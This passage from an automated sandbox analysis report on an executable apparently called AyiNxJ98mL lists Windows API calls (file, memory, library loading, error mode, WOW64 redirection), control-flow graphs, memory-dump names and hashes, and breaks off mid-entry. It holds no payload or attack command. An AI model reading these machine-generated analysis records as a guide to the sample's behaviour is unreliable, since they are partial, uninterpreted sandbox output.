                                                              • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                              • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                              Control-flow Graph

                                                              APIs
                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: .tmp$y@
                                                              • API String ID: 2030045667-2396523267
                                                              • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                              • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                              • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                              • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                              • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID: .tmp
                                                              • API String ID: 1375471231-2986845003
                                                              • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                              • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                              • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                              • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 261 401430-40143d 262 401446-40144c 261->262 263 40143f-401444 261->263 264 401452-40146a VirtualAlloc 262->264 263->264 265 40146c-40147a call 4012e4 264->265 266 40148f-401492 264->266 265->266 269 40147c-40148d VirtualFree 265->269 269->266
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID: dN
                                                              • API String ID: 2087232378-713126577
                                                              • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                              • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                              • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                              • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 330 407749-40774a 331 4076dc-4076e6 WriteFile 330->331 332 40774c-40776f 330->332 334 4076e8-4076ea call 40748c 331->334 335 4076ef-4076f2 331->335 333 407770-407785 332->333 336 407787 333->336 337 4077f9 333->337 334->335 339 407700-407704 335->339 340 4076f4-4076fb call 4073ec 335->340 341 40778a-40778f 336->341 342 4077fd-407802 336->342 343 40783b-40783d 337->343 344 4077fb 337->344 340->339 348 407803-407819 341->348 350 407791-407792 341->350 342->348 346 407841-407843 343->346 344->342 349 40785b-40785c 346->349 348->349 358 40781b 348->358 351 4078d6-4078eb call 407890 InterlockedExchange 349->351 352 40785e-40788c 349->352 353 407724-407741 350->353 354 407794-4077b4 350->354 372 407912-407917 351->372 373 4078ed-407910 351->373 369 407820-407823 352->369 370 407890-407893 352->370 357 4077b5 353->357 360 407743 353->360 354->357 362 4077b6-4077b7 357->362 363 4077f7-4077f8 357->363 364 40781e-40781f 358->364 366 407746-407747 360->366 367 4077b9 360->367 362->367 363->337 364->369 366->330 368 4077bb-4077cd 366->368 367->368 368->346 375 4077cf-4077d4 368->375 374 407898 369->374 376 407824 369->376 370->374 373->372 373->373 377 40789a 374->377 375->343 381 4077d6-4077de 375->381 376->377 379 407825 376->379 380 40789f 377->380 382 407896-407897 379->382 383 407826-40782d 379->383 384 4078a1 380->384 381->333 393 4077e0 381->393 382->374 383->384 386 40782f 383->386 390 4078a3 384->390 391 4078ac 384->391 388 407832-407833 386->388 389 4078a5-4078aa 386->389 388->343 388->364 392 4078ae-4078af 389->392 390->389 391->392 392->380 394 4078b1-4078bd 392->394 393->363 394->374 395 4078bf-4078c0 394->395
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                              • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                              • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                              • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 396 401658-40168d 397 4016c7-4016cd 396->397 398 40168f-40169a 397->398 399 4016cf-4016d4 397->399 400 40169c 398->400 401 40169f-4016a1 398->401 400->401 402 4016a3 401->402 403 4016a5-4016a7 401->403 402->403 404 4016c5 403->404 405 4016a9-4016b9 VirtualFree 403->405 404->397 405->404 406 4016bb 405->406 406->404
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID: dN
                                                              • API String ID: 1263568516-713126577
                                                              • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                              • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                              • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                              • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 407 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLibraryLoadMode
                                                              • String ID:
                                                              • API String ID: 2987862817-0
                                                              • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                              • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                              • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                              • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                              • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021B03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                              • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                              • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                              • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 411 40762c-40764a ReadFile 412 407663-40766a 411->412 413 40764c-407650 411->413 414 407652-40765a GetLastError 413->414 415 40765c-40765e call 40748c 413->415 414->412 414->415 415->412
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                              • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastRead
                                                              • String ID:
                                                              • API String ID: 1948546556-0
                                                              • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                              • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                              • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                              • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                              • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021B03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                              • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                              • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                              • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                              • String ID:
                                                              • API String ID: 1658689577-0
                                                              • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                              • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                              • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                              • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                              • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                              • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                              • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                              • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                              • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                              • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                              • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                              • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                              • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021B03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                              • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                              • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                              • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage
                                                              • String ID:
                                                              • API String ID: 1306739567-0
                                                              • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                              • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                              • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                              • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                              APIs
                                                              • SetEndOfFile.KERNEL32(?,021D4000,0040A08C,00000000), ref: 004076B3
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021B03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast
                                                              • String ID:
                                                              • API String ID: 734332943-0
                                                              • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                              • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                              • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                              • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                              • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                              • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                              • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                              • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                              • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                              • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                              APIs
                                                              • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CharPrev
                                                              • String ID:
                                                              • API String ID: 122130370-0
                                                              • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                              • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
